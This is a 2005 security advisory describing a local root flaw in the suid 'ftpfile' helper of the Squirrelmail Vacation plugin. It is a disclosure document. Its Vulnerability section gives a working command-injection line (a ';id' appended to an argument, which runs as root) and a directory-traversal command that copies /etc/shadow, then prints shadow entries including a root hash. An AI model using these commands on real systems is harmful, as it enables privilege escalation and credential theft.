LSS Security Advisory #LSS-2005-01-03 http://security.lss.hr --- Title : Squirrelmail vacation v0.15 local root exploit Advisory ID : LSS-2005-01-03 Date : 10.01.2005. Advisory URL: : http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03 Impact : Privilege escalation and arbitrary file read Risk level : High Vulnerability type : Local Vendors contacted : No response from vendor --- ===[ Overview Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply message to incoming email. That is commonly used to notify the sender of the receiver's absence. Vacation plugin specifically uses the Vacation program. Plugin can be downloaded from: http://www.squirrelmail.org/plugins/vacation0.15-1.43a.tar.gz ===[ Vulnerability Within Squirrelmail Vacation plugin there is suid root program 'ftpfile'. The program is used to access local files in user's home directory. There is a privilege escalation and arbitrary file read vulnerability in ftpfile. Command line arguments are passed to execve() function without checking for meta-characters, therefore making possible execution of commands as root. [ljuranic@laptop ljuranic]$ id uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic) [ljuranic@laptop ljuranic]$ ftpfile 0 root 0 get 0 "LSS-Security;id" /bin/cp: omitting directory `/root/0' uid=0(root) gid=513(ljuranic) groups=513(ljuranic) [ljuranic@laptop ljuranic]$ It is also possible to read restricted files (such as /etc/shadow), since ftpfile can copy a file from user's home directory to any other directory without checking file name for directory traversal attack. $ ftpfile localhost root root get ../../../../etc/shadow ./shadow ./shadow[ljuranic@laptop ljuranic]$ head ./shadow root:$1$Pwqt1daJ$DIe.fhBadNTN6d1br1OGy0:12401:0:99999:7::: bin:*:10929:0:99999:7::: daemon:*:10929:0:99999:7::: lp:*:10929:0:99999:7::: [ljuranic@laptop ljuranic]$ ===[ Affected versions Squirrelmail Vacation v0.15 and previous versions. ===[ Fix Not available yet. ===[ PoC Exploit http://security.lss.hr/exploits/ ===[ Credits Credits for this vulnerability goes to Leon Juranic. ===[ LSS Security Contact LSS Security Team, WWW : http://security.lss.hr E-mail : security@LSS.hr Tel : +385 1 6129 775